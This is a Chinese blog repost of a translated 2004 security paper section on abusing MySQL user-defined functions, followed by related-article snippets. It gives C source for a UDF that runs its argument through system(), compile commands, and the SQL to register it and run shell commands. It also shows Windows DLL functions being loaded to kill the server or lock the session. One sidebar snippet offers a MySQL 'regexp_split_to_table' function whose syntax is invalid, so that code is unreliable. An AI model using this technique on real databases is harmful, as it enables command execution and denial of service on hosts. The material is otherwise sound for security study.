mysql 修改函数 用户_MYSQL用户自定义函数的利用(Linux)

最新推荐文章于 2023-02-26 23:43:03 发布
最新推荐文章于 2023-02-26 23:43:03 发布
阅读量298 收藏
点赞数
文章标签: mysql 修改函数 用户
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33746833/article/details/113312357
版权

MYSQL用户自定义函数的利用(Linux)

Chris Anley [chris@ngssoftware.com] 5th July 2004

根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf

通过CREATE FUNCTION语句来实现这一机制,同时通过向'mysql.func'表录入信息来加载他们.

通常当MYSQL加载这些动态库时,该动态库文件路径必须能被MYSQL访问.

攻击者会滥用这一机制别有用心地创建一些“恶毒”的动态库文件并将它们通过SELECT ... INTO OUTFILE语句写入可用的目录.当这些文件创建成功过后,攻击者通过insert向mysql.func表录入信息以配置MYSQL加载这些动态库文件和执行这些函数。

下面是一段相当简单的UDF链接库的代码(请原谅他很简陋)(老外真有礼貌!):

#include

#include

/*

compile with something like

gcc -g -c so_system.c

then

gcc -g -shared -W1,-soname,so_system.so.0 -o so_system.so.0.0 so_system.o -lc

*/

enum Item_result {STRING_RESULT, REAL_RESULT, INT_RESULT, ROW_RESULT};

typedef struct st_udf_args

{

unsigned int arg_count; /* Number of arguments */

enum Item_result *arg_type; /* Pointer to item_results */

char **args; /* Pointer to argument */

unsigned long *lengths; /* Length of string arguments */

char *maybe_null; /* Set to 1 for all maybe_null args */

Page 18

} UDF_ARGS;

typedef struct st_udf_init

{

char maybe_null; /* 1 if function can return NULL */

unsigned int decimals; /* for real functions */

unsigned long max_length; /* For string functions */

char *ptr; /* free pointer for function data */

char const_item; /* 0 if result is independent of arguments */

} UDF_INIT;

int do_system( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

{

if( args->arg_count != 1 )

return 0;

system( args->args[0] );

return 0;

}

像这样添加函数:

mysql> create function do_system returns integer soname 'so_system.so';

Query OK, 0 rows affected (0.00 sec)

现在表mysql.func类似于这样,当然你也可以使用update来修改它。

mysql> select * from mysql.func;

+-----------+-----+--------------+----------+

| name | ret | dl | type |

+-----------+-----+--------------+----------+

| do_system | 2 | so_system.so | function |

+-----------+-----+--------------+----------+

1 row in set (0.00 sec)

调用函数:

mysql> select do_system('ls > /tmp/test.txt');

+---------------------------------+

| do_system('ls > /tmp/test.txt') |

+---------------------------------+

| -4665733612002344960 |

+---------------------------------+

1 row in set (0.02 sec)

即便文件权限不允许我们在目标系统上建立自己的动态库文件,我们仍然有可能利用已经存在的函数来达成一些邪恶的意图。这给攻击者的困难是,函数的参数列表和MySQL UDF的函数原型不相符:

int xxx( UDF_INIT *initid, UDF_ARGS *args, char *is_null, char *error)

。。。。。。尽管诡计多端的攻击者可能能够设计出通过调用系统已存在的动态库中可控制的弱点来执行任意代码,但仍然是困难的。

Page 19

当MySQL解析执行传递的参数时,仍然可能通过现存的动态库中的函数来做“坏”事的可能性。

举个例子来讲,通过在windows中将函数ExitProcess作为MYSQL UDF来进行调用, 这将立即导致退出,即使你在mysql中并没有shutdown的权限。

mysql> create function ExitProcess returns integer soname 'kernel32';

Query OK, 0 rows affected (0.17 sec)

mysql> select exitprocess();

ERROR 2013: Lost connection to MySQL server during query

你也能讲当前工作站的登录会话锁定(作用相当于ctrl + del alt):

mysql> create function LockWorkStation returns integer soname 'user32';

Query OK, 0 rows affected (0.00 sec)

mysql> select LockWorkStation();

本文转hackfreer51CTO博客,原文链接:http://blog.51cto.com/pnig0s1992/575462,如需转载请自行联系原作者

黑科技玩机
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
mysql udf 插件_编写MYSQL插件(UDF)使其实现Split函数
weixin_34329524的博客
02-17 151
MYSQL UDF插件好像不能返回结果集MFC DLL工程, 静态库链接, UNICODE字符编码新建cpp, 代码如下#include "stdafx.h"#include "tokenize.h"#include "mysql/mysql.h"#include #ifdef _DEBUG#define new DEBUG_NEW#endifvoid UCS2_TO_UTF8(std::stri...
mysql用户分配过程函数_MYSQL用户定义函数(UDF)
weixin_39854070的博客
01-28 139
UDF资源文件UDF测试程序这里解释什么是用户定义函数(UDF),是做什么的和怎样使用1)用户定义函数(UDF)是什么?基本用户定义函数是一类代码,对MYSQL服务器功能进行扩充,通过添加新函数,性质就象使用本地MYSQL函数abs()或concat().UDF是用C(或C++)写的。也许还可以用BASIC,.NET或其它什么虽然我还没见过有人这么做。2)为什么和怎样使用UDF功能?从字面上何以知...
Mysql函数手册.rar_MySQL函数手册_VZI_mysql 函数手册
09-15
MySQL数据库函数手册,私家珍藏,经验积累
MySQL统计函数GROUP_CONCAT使用陷阱分析
09-10
主要介绍了MySQL统计函数GROUP_CONCAT使用中的陷阱,结合实例形式分析了GROUP_CONCAT用于统计时的长度限制问题与相关注意事项,需要的朋友可以参考下
mysql中find_in_set函数的基本使用方法
01-21
前言 这是我最近新接触到的一个函数, 我在项目中的使用场景是这样的: 有一个应用类型表,表中有parentId字段和parentIds字段,前者为父级id,后者为多级父级id,在库中都是varchar类型,parentIds由多个父级id拼接而成由”,”分隔. 组长告知我可以使用该函数,就去进行了了解与使用. 语法 FIND_IN_SET(str,strlist) 定义 假如字符串str在由多个子链组成的字符串列表strlist中,则返回值的范围在1到N之间。 一个字符串列表就是一个由一些被‘,’符号分开的自链组成的字符串。 如果第一个参数是一个常数字符串,而第二个是type
mysql_function_china_workday:MySQL定义函数,中国法定节假日,计算
02-13
mysql_function_china_workday 使用mysql是json函数,通过给每个工作日索引的方式,计算法定节假日时效 workday.php 循环出每年日历的JSON。 wokday.sql 自定义函数的sql 注意 未兼容下班后(例如:18:00)算下一个工作日 没有0个工作日概念,所以结果+1 不支持mysql 5.6版本 测试用,勿适用于生产环境
MySQL8修改存储过程/函数/触发器的definer
我的博客
03-15 3953
介绍MySQL8关于存储过程/函数等权限授权以及definer的修改
mysql udf介绍_MySQL UDF 用户定义函数
weixin_34569101的博客
01-19 1346
MySQL 数据库除了系统提供的内置函数外,还提供了用户定义函数的功能UDF(User defined Function)。MySQL 服务已经提供了很多内置函数用户使用。如果您还是有建立新函数的需求的话,可以使用UDF。一、添加新函数的方法1、通过用户定义函数(UDF)接口添加函数用户定义函数被编译为库文件,然后使用CREATE FUNCTION和DROP FUNCTION语句动态地添...
Mysql定义函数UDF
qq_43012693的博客
08-20 554
UDF是mysql的一个拓展接口,用来自定义mysql函数,是一种拓展Mysql的技术手段 语法: create function 函数名(【参数列表】) returns 数据类型 begin sql语句 return 值 end; 例题 100以内求和 DELIMITER // CREATE FUNCTION testFail() RETURNS VARCHAR(10) BEGIN DECLARE num,`sum` INT(11) DEFAULT 0; WHILE num<=100 DO
mysql udf函数_Linux平台下 MYSQL用户定义函数(UDF)的利用
weixin_39623273的博客
02-01 150
来源:http://hi.baidu.com/ylbhzLinux平台下 MYSQL用户定义函数(UDF)的利用Chris Anley [chris@ngssoftware.com] 5th July 2004根据MySQL函数族的可扩展机制,意味着用户可以自己建立包含有自定义函数的动态库来创建自定义函数,简称udf通过CREATE FUNCTION语句来实现这一机制,同时通过向’mysql.f...
mysql定义函数默认值_Mysql定义函数(function)
weixin_39999222的博客
01-27 905
语法自定义函数也需要相应的要求,语法如下:CREATE FUNCTION(参数列表)RETURNS返回值类型函数体删除:DROPFUNCTION调用自定义函数语法:SELECT(parameter_value,...)语法实例create function rand_string(n int) returns varchar(255)begindeclare chars_str varchar...
mysql 创建函数 权限_MySQL赋予用户执行自定义Function的权限
weixin_42306938的博客
01-19 4509
将远程数据库导入到本地之后,一启动项目就报错“executecommanddeniedtouser”,提示用户没权限执行自定义FunctionCaused by: java.sql.SQLSyntaxErrorException: execute command denied to user 'cxcs'@'localhost' for routine 'hzcx.getOrgName'a...
179.MySQL定义函数(UDF)
02-15 461
转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 大写M就是英文,小写m就是数字 这里需要注意RETURNS定义函数返回类型,后面的RETURN相当于函数体。 转存失败重新上传取消正在上传…重新上传取消正在上传…重新上传取消转存失败重新上传取消 自定义复合结果函...
修改mysql的definer定义者、方法定义者、时间定义者、视图定义
Sun的专栏
02-26 688
修改mysql的definer定义者、方法定义者、时间定义者、视图定义
mysql 视图definer_修改MySQL存储过程、函数、事件、触发器、视图的DEFINER
weixin_39607865的博客
02-02 195
mysql导入导出数据 关键字: db mysql 1、导出整个数据库 mysqldump -u 用户名 -p 数据库名 > 导出的文件名 mysqldump -u root -p testDb > db.sql 2.导出数据库#修改存储过程、函数、事件、触发器、视图的 DEFINERselect definer from mysql.proc;update mysql.proc se...
mysql linux udf_MySQL的UDF
weixin_42604188的博客
01-19 246
MySQL中,通过CREATE FUNCTION命令可以调用不同的.so共享库文件.在编译前需要加上选项:--with-mysqld-ldflags=-rdynamic重新编译的时候出了点小问题,可能是升级系统时丢失了……configure: error: No curses/termcap library found解决方法:sudo apt-get install libncurses5-d...
mysql udf 怎么编写_MySQL:如何编写UDF_MySQL
weixin_34593927的博客
02-06 431
bitsCN.com1.什么是UDFUDF顾名思义,就是User defined Function,用户定义函数。我们知道,MySQL本身支持很多内建的函数,此外还可以通过创建存储方法来定义函数。UDF为用户提供了一种更高效的方式来创建函数。UDF与普通函数类似,有参数,也有输出。分为两种类型:单次调用型和聚集函数。前者能够针对每一行数据进行处理,后者则用于处理Group By这样的情况。2.为什...
MySQL UDF(自定义函数
weixin_30344995的博客
03-30 173
UDF介绍 官方介绍请点击http://dev.mysql.com/doc/refman/5.5/en/adding-functions.html UDF是mysql的一个拓展接口,UDF(Userdefined function)可翻译为用户定义函数,这个是用来拓展Mysql的技术手段。 背景:select count(*) from table; 上述count是mysql内部...
mysql查询加载的udf_MySQL 加载UDF(自定义函数
weixin_29353947的博客
02-04 251
我们神一样的研发这几天抱怨mysql提供的功能太少,然后就动手自己写UDF并加载到mysql中。这里顺便就记录一下操作过程:其中链接库名:lib_mysqludf_json.so (作用是解析数据库中存放的json数据)1,上传链接库到服务器 ... ... (如果有备库,备库也得一样)2,修改属主和授可执行权限chown mysql:mysql /home/lidan/lib_mysqludf...
mysql定义函数regexp_split_to_table
最新发布
06-01
MySQL 中,可以使用自定义函数来实现 `regexp_split_to_table()` 的功能。 下面是一个示例: 首先,创建一个名为 `regexp_split_to_table` 的函数,代码如下: ```sql CREATE FUNCTION regexp_split_to_table( str TEXT, delimeter VARCHAR(12) ) RETURNS TABLE(value TEXT) BEGIN DECLARE cur_pos INT DEFAULT 1; DECLARE next_pos INT DEFAULT 1; DECLARE len INT DEFAULT LENGTH(str); DECLARE val TEXT; WHILE cur_pos <= len DO SET next_pos = LOCATE(delimeter, str, cur_pos); IF next_pos = 0 THEN SET next_pos = len + 1; END IF; SET val = SUBSTR(str, cur_pos, next_pos - cur_pos); SET cur_pos = next_pos + LENGTH(delimeter); INSERT INTO value(value) VALUES(val); END WHILE; RETURN; END; ``` 然后,使用该函数将字符串按照正则表达式分隔成多行数据,代码如下: ```sql SELECT value FROM regexp_split_to_table('1,2,3,4,5', ','); ``` 输出结果如下: ``` +-------+ | value | +-------+ | 1 | | 2 | | 3 | | 4 | | 5 | +-------+ ``` 可以看到,字符串 `'1,2,3,4,5'` 已经按逗号分隔成了多行数据。如果要按照其他分隔符进行分隔,则只需要修改函数的代码即可。 需要注意的是,自定义函数的执行效率可能比内置函数低,因此在处理大量数据时需要谨慎使用。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值